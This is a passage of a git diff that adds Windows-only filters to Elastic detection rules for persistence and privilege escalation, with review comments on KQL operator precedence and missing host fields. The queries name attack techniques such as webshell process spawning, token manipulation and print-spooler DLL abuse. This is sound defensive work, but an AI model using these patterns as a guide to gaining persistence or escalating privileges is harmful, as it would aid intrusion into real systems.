 (dll.name : "taskschd.dll" or file.name : "taskschd.dll")
diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml
index 0957a14d7..91e748260 100644
--- a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml
+++ b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and /* Schedule service cmdline on Win10+ */ process.parent.name : "svchost.exe" and process.parent.args : "Schedule" and /* add suspicious programs here */ diff --git a/rules/windows/persistence_suspicious_service_created_registry.toml b/rules/windows/persistence_suspicious_service_created_registry.toml index e7d2b5e88..cacbfc95b 100644 --- a/rules/windows/persistence_suspicious_service_created_registry.toml +++ b/rules/windows/persistence_suspicious_service_created_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.path : "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath" and +registry where host.os.type == "windows" and registry.path : "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath" and /* add suspicious registry ImagePath values here */ registry.data.strings : ("%COMSPEC%*", "*\\.\\pipe\\*") ''' diff --git a/rules/windows/persistence_system_shells_via_services.toml b/rules/windows/persistence_system_shells_via_services.toml index 50d740848..dff616c8d 100644 --- a/rules/windows/persistence_system_shells_via_services.toml +++ b/rules/windows/persistence_system_shells_via_services.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -61,7 +61,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "services.exe" and process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") and diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml index fa1ce3ad3..630f039e7 100644 --- a/rules/windows/persistence_temp_scheduled_task.toml +++ b/rules/windows/persistence_temp_scheduled_task.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,8 +27,8 @@ type = "eql" query = ''' sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m - [iam where event.action == "scheduled-task-created" and not user.name : "*$"] - [iam where event.action == "scheduled-task-deleted" and not user.name : "*$"] + [iam where host.os.type == "windows" and event.action == "scheduled-task-created" and not user.name : "*$"] + [iam where host.os.type == "windows" and event.action == "scheduled-task-deleted" and not user.name : "*$"] ''' [[rule.threat]] diff --git a/rules/windows/persistence_time_provider_mod.toml b/rules/windows/persistence_time_provider_mod.toml index 672b5f69a..2f0978cd3 100644 --- a/rules/windows/persistence_time_provider_mod.toml +++ b/rules/windows/persistence_time_provider_mod.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type:"change" and +registry where host.os.type == "windows" and event.type:"change" and registry.path:"HKLM\\SYSTEM\\*ControlSet*\\Services\\W32Time\\TimeProviders\\*" and registry.data.strings:"*.dll" ''' diff --git a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml index 805b4dab5..ea51372ee 100644 --- a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml +++ b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Skoetting"] @@ -62,7 +62,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -iam where event.action == "added-member-to-group" and +iam where host.os.type == "windows" and event.action == "added-member-to-group" and group.name : ("Admin*", "Local Administrators", "Domain Admins", diff --git a/rules/windows/persistence_user_account_creation.toml b/rules/windows/persistence_user_account_creation.toml index 5609f8f65..a397bf048 100644 --- a/rules/windows/persistence_user_account_creation.toml +++ b/rules/windows/persistence_user_account_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -62,7 +62,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : ("net.exe", "net1.exe") and not process.parent.name : "net.exe" and (process.args : "user" and process.args : ("/ad", "/add")) diff --git a/rules/windows/persistence_user_account_creation_event_logs.toml b/rules/windows/persistence_user_account_creation_event_logs.toml index 796dfc597..89069980f 100644 --- a/rules/windows/persistence_user_account_creation_event_logs.toml +++ b/rules/windows/persistence_user_account_creation_event_logs.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/04" integration = ["system", "windows"] maturity = "development" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Skoetting"] @@ -29,7 +29,8 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.module : ("system" or "security") and (event.code : "4720" or event.action : "added-user-account") +event.module:("system" or "security") and host.os.type:windows and + (event.code:"4720" or event.action:"added-user-account") ''' diff --git a/rules/windows/persistence_via_application_shimming.toml b/rules/windows/persistence_via_application_shimming.toml index 453407281..77def2fd9 100644 --- a/rules/windows/persistence_via_application_shimming.toml +++ b/rules/windows/persistence_via_application_shimming.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
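Review bot: The added `host.os.type:windows` in the persistence_user_account_creation_event_logs query turns a field that only some shippers populate into a hard match requirement, so a 4720 event that arrives without `host.os.type` now produces no alert at all rather than a noisy one. This is most likely to bite Security-log events collected via Windows Event Forwarding: if I recall the Winlogbeat reference config correctly, `add_host_metadata` is gated on the event not being tagged `forwarded`, which is exactly the path a domain's account-creation events often take. Since the rule's `note`/`setup` sections are outside this hunk I cannot tell whether that dependency is already documented; if not, a sentence such as `This rule requires host.os.type to be populated (e.g. by the add_host_metadata processor); events forwarded through a WEF collector without it will not match.` would save an analyst from a silent gap. A quick data check (`event.code:4720 and not host.os.type:*`) before and after deployment would confirm nothing was dropped.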
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.name : "sdbinst.exe" and +process where host.os.type == "windows" and event.type == "start" and process.name : "sdbinst.exe" and not (process.args : "-m" and process.args : "-bg") and not process.args : "-mm" ''' diff --git a/rules/windows/persistence_via_bits_job_notify_command.toml b/rules/windows/persistence_via_bits_job_notify_command.toml index 82c913059..316e5377a 100644 --- a/rules/windows/persistence_via_bits_job_notify_command.toml +++ b/rules/windows/persistence_via_bits_job_notify_command.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -36,7 +36,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "svchost.exe" and process.parent.args : "BITS" and not process.executable : ("?:\\Windows\\System32\\WerFaultSecure.exe", diff --git a/rules/windows/persistence_via_hidden_run_key_valuename.toml b/rules/windows/persistence_via_hidden_run_key_valuename.toml index 06fa08b61..162a72863 100644 --- a/rules/windows/persistence_via_hidden_run_key_valuename.toml +++ b/rules/windows/persistence_via_hidden_run_key_valuename.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -34,7 +34,7 @@ type = "eql" query = ''' /* Registry Path ends with backslash */ -registry where /* length(registry.data.strings) > 0 and */ +registry where host.os.type == "windows" and /* length(registry.data.strings) > 0 and */ registry.path : ("HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "HKU\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", diff --git a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml index bfc21218c..1d09a6c43 100644 --- a/rules/windows/persistence_via_lsa_security_support_provider_registry.toml +++ b/rules/windows/persistence_via_lsa_security_support_provider_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and registry.path : ("HKLM\\SYSTEM\\*ControlSet*\\Control\\Lsa\\Security Packages*", "HKLM\\SYSTEM\\*ControlSet*\\Control\\Lsa\\OSConfig\\Security Packages*") and not process.executable : ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe") diff --git a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml index d52a219c5..1c9fce60c 100644 --- a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml +++ b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "CompatTelRunner.exe" and process.args : "-cv*" and not process.name : ("conhost.exe", "DeviceCensus.exe", diff --git a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml index a7585c28b..4b5b7b8f7 100644 --- a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml +++ b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -82,7 +82,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.executable : "C:\\Windows\\System32\\svchost.exe" and process.parent.args : "UsoSvc" and not process.executable : diff --git a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml index 2f142104f..f17492457 100644 --- a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml +++ b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "wmic.exe" or process.pe.original_file_name == "wmic.exe") and process.args : "create" and process.args : ("ActiveScriptEventConsumer", "CommandLineEventConsumer") diff --git a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml index 8041117b4..f1db5d3cb 100644 --- a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml +++ b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and registry.data.strings != null and process.name : "WmiPrvSe.exe" and registry.path : ( "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", diff --git a/rules/windows/persistence_webshell_detection.toml b/rules/windows/persistence_webshell_detection.toml index 7016a2fa1..c22180f86 100644 --- a/rules/windows/persistence_webshell_detection.toml +++ b/rules/windows/persistence_webshell_detection.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -80,7 +80,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : ("w3wp.exe", "httpd.exe", "nginx.exe", "php.exe", "php-cgi.exe", "tomcat.exe") and process.name : ("cmd.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "wmic.exe", "wscript.exe") ''' diff --git a/rules/windows/privilege_escalation_create_process_as_different_user.toml b/rules/windows/privilege_escalation_create_process_as_different_user.toml index 3ba988511..e962008f8 100644 --- a/rules/windows/privilege_escalation_create_process_as_different_user.toml +++ b/rules/windows/privilege_escalation_create_process_as_different_user.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,14 +34,14 @@ type = "eql" query = ''' sequence by winlog.computer_name with maxspan=1m -[authentication where event.action:"logged-in" and +[authentication where host.os.type == "windows" and event.action:"logged-in" and event.outcome == "success" and user.id : ("S-1-5-21-*", "S-1-12-1-*") and /* seclogon service */ process.name == "svchost.exe" and winlog.event_data.LogonProcessName : "seclogo*" and source.ip == "::1" ] by winlog.event_data.TargetLogonId -[process where event.type == "start"] by winlog.event_data.TargetLogonId +[process where host.os.type == "windows" and event.type == "start"] by winlog.event_data.TargetLogonId ''' 
diff --git a/rules/windows/privilege_escalation_credroaming_ldap.toml b/rules/windows/privilege_escalation_credroaming_ldap.toml index 8c14dd73d..1523c3e10 100644 --- a/rules/windows/privilege_escalation_credroaming_ldap.toml +++ b/rules/windows/privilege_escalation_credroaming_ldap.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -55,9 +55,9 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action:"Directory Service Changes" and event.code:"5136" and - winlog.event_data.AttributeLDAPDisplayName:"msPKIAccountCredentials" and winlog.event_data.OperationType:"%%14674" and - not winlog.event_data.SubjectUserSid : "S-1-5-18" +event.action:"Directory Service Changes" and host.os.type:windows and event.code:"5136" and + winlog.event_data.AttributeLDAPDisplayName:"msPKIAccountCredentials" and winlog.event_data.OperationType:"%%14674" and + not winlog.event_data.SubjectUserSid : "S-1-5-18" ''' diff --git a/rules/windows/privilege_escalation_disable_uac_registry.toml b/rules/windows/privilege_escalation_disable_uac_registry.toml index 1d6b08917..54088af74 100644 --- a/rules/windows/privilege_escalation_disable_uac_registry.toml +++ b/rules/windows/privilege_escalation_disable_uac_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type == "change" and +registry where host.os.type == "windows" and event.type == "change" and registry.path : ( "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", diff --git a/rules/windows/privilege_escalation_group_policy_iniscript.toml b/rules/windows/privilege_escalation_group_policy_iniscript.toml index 866b4b82c..dfd445c52 100644 --- a/rules/windows/privilege_escalation_group_policy_iniscript.toml +++ b/rules/windows/privilege_escalation_group_policy_iniscript.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -98,6 +98,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' +host.os.type:windows and ( event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and diff --git a/rules/windows/privilege_escalation_group_policy_privileged_groups.toml b/rules/windows/privilege_escalation_group_policy_privileged_groups.toml index 43162f135..635a392ef 100644 --- a/rules/windows/privilege_escalation_group_policy_privileged_groups.toml +++ b/rules/windows/privilege_escalation_group_policy_privileged_groups.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
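Review bot: In the privilege_escalation_group_policy_iniscript hunk the new `host.os.type:windows and` is prepended in front of a parenthesised group that starts on its own line, and if the remainder of the query (outside this hunk) is of the form `( … ) or ( … )`, the OS filter binds only to the first group, because KQL gives `and` precedence over `or`. The sibling rule privilege_escalation_group_policy_scheduled_task in this same commit has exactly that `( … ) or` shape, so it is a reasonable assumption that this one does too; please confirm against the full query. If so, the safe form is `host.os.type:windows and (` followed by the entire original expression and a closing `)` on the last line, so that every alternative is scoped to Windows. The enclosing query continues past the end of the hunk.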
@@ -80,8 +80,9 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.code: "5136" and winlog.event_data.AttributeLDAPDisplayName:"gPCMachineExtensionNames" and -winlog.event_data.AttributeValue:(*827D319E-6EAC-11D2-A4EA-00C04F79F83A* and *803E14A0-B4FB-11D0-A0D0-00A0C90F574B*) +host.os.type:windows and event.code: "5136" and + winlog.event_data.AttributeLDAPDisplayName:"gPCMachineExtensionNames" and + winlog.event_data.AttributeValue:(*827D319E-6EAC-11D2-A4EA-00C04F79F83A* and *803E14A0-B4FB-11D0-A0D0-00A0C90F574B*) ''' diff --git a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml index b7b2f2195..db1e4cc91 100644 --- a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml +++ b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -100,6 +100,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' +host.os.type:windows and (event.code: "5136" and winlog.event_data.AttributeLDAPDisplayName:("gPCMachineExtensionNames" or "gPCUserExtensionNames") and winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*)) or diff --git a/rules/windows/privilege_escalation_installertakeover.toml b/rules/windows/privilege_escalation_installertakeover.toml index e0e9a2d9e..bdd6f3cd6 100644 --- a/rules/windows/privilege_escalation_installertakeover.toml +++ b/rules/windows/privilege_escalation_installertakeover.toml 
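Review bot: In the privilege_escalation_group_policy_scheduled_task hunk the new first line `host.os.type:windows and` is ANDed only with the first alternative `(event.code: "5136" and …)`, because the context line that follows ends in `or` and KQL binds `and` tighter than `or`; whatever alternative follows that `or` (outside the hunk) is left unfiltered by OS, which is the opposite of what the commit intends. The original query was `(A) or (B)`; the new one reads as `(windows and A) or B`. The fix is to wrap the whole original expression: `host.os.type:windows and (` on the first line, the original `(event.code: "5136" and …) or …` unchanged inside, and a closing `)` before the final `'''`. The query body runs past the end of this hunk, so the closing parenthesis lands on a line I cannot see.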
@@ -2,7 +2,7 @@ creation_date = "2021/11/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -87,7 +87,7 @@ type = "eql" query = ''' /* This rule is compatible with both Sysmon and Elastic Endpoint */ -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (?process.Ext.token.integrity_level_name : "System" or ?winlog.event_data.IntegrityLevel : "System") and ( diff --git a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml index a515d0ef5..b3d4af940 100644 --- a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml +++ b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ type = "eql" query = ''' sequence by winlog.computer_name with maxspan=5m - [authentication where + [authentication where host.os.type == "windows" and /* event 4624 need to be logged */ event.action == "logged-in" and event.outcome == "success" and @@ -41,7 +41,7 @@ sequence by winlog.computer_name with maxspan=5m winlog.event_data.AuthenticationPackageName :"Kerberos" and winlog.logon.type == "Network" and cidrmatch(source.ip, "127.0.0.0/8", "::1") and source.port > 0] by winlog.event_data.TargetLogonId - [any where + [any where host.os.type == "windows" and /* event 4697 need to be logged */ event.action : "service-installed"] by winlog.event_data.SubjectLogonId ''' 
diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml index ed541ca10..69b384f4f 100644 --- a/rules/windows/privilege_escalation_lsa_auth_package.toml +++ b/rules/windows/privilege_escalation_lsa_auth_package.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type == "change" and +registry where host.os.type == "windows" and event.type == "change" and registry.path : "HKLM\\SYSTEM\\*ControlSet*\\Control\\Lsa\\Authentication Packages" and /* exclude SYSTEM SID - look for changes by non-SYSTEM user */ not user.id : "S-1-5-18" diff --git a/rules/windows/privilege_escalation_named_pipe_impersonation.toml b/rules/windows/privilege_escalation_named_pipe_impersonation.toml index 2ebf4536e..973eb6521 100644 --- a/rules/windows/privilege_escalation_named_pipe_impersonation.toml +++ b/rules/windows/privilege_escalation_named_pipe_impersonation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -84,7 +84,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.pe.original_file_name in ("Cmd.Exe", "PowerShell.EXE") and process.args : "echo" and process.args : ">" and process.args : "\\\\.\\pipe\\*" ''' 
diff --git a/rules/windows/privilege_escalation_persistence_phantom_dll.toml b/rules/windows/privilege_escalation_persistence_phantom_dll.toml index 04199373b..b5f27e282 100644 --- a/rules/windows/privilege_escalation_persistence_phantom_dll.toml +++ b/rules/windows/privilege_escalation_persistence_phantom_dll.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/28" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -86,7 +86,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where +any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and ( /* compatible with Elastic Endpoint Library Events */ diff --git a/rules/windows/privilege_escalation_port_monitor_print_pocessor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_pocessor_abuse.toml index ce499c829..8137eebf9 100644 --- a/rules/windows/privilege_escalation_port_monitor_print_pocessor_abuse.toml +++ b/rules/windows/privilege_escalation_port_monitor_print_pocessor_abuse.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and registry.path : ("HKLM\\SYSTEM\\*ControlSet*\\Control\\Print\\Monitors\\*", "HKLM\\SYSTEM\\*ControlSet*\\Control\\Print\\Environments\\Windows*\\Print Processors\\*") and registry.data.strings : "*.dll" and 
diff --git a/rules/windows/privilege_escalation_posh_token_impersonation.toml b/rules/windows/privilege_escalation_posh_token_impersonation.toml index 4051d0448..8bb7130fd 100644 --- a/rules/windows/privilege_escalation_posh_token_impersonation.toml +++ b/rules/windows/privilege_escalation_posh_token_impersonation.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/05" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -51,7 +51,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text:( "Invoke-TokenManipulation" or "ImpersonateNamedPipeClient" or diff --git a/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml b/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml index 0e443e572..f03a4121b 100644 --- a/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml +++ b/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -31,10 +31,10 @@ type = "eql" query = ''' sequence by host.id with maxspan=30s -[registry where +[registry where host.os.type == "windows" and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers\\*\\SpoolDirectory" and registry.data.strings : "C:\\Windows\\System32\\spool\\drivers\\x64\\4"] -[registry where +[registry where host.os.type == "windows" and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers\\*\\CopyFiles\\Payload\\Module" and registry.data.strings : "C:\\Windows\\System32\\spool\\drivers\\x64\\4\\*"] ''' diff --git a/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml b/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml index f5c4d7f3d..d66594b46 100644 --- a/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml +++ b/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/21" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and +file where host.os.type == "windows" and event.type == "creation" and process.name : "spoolsv.exe" and file.extension : "dll" and file.path : ("?:\\Windows\\System32\\*", "?:\\Windows\\SysWOW64\\*") and not file.path : diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml index 001227bbd..15fd3b169 100644 --- a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml +++ 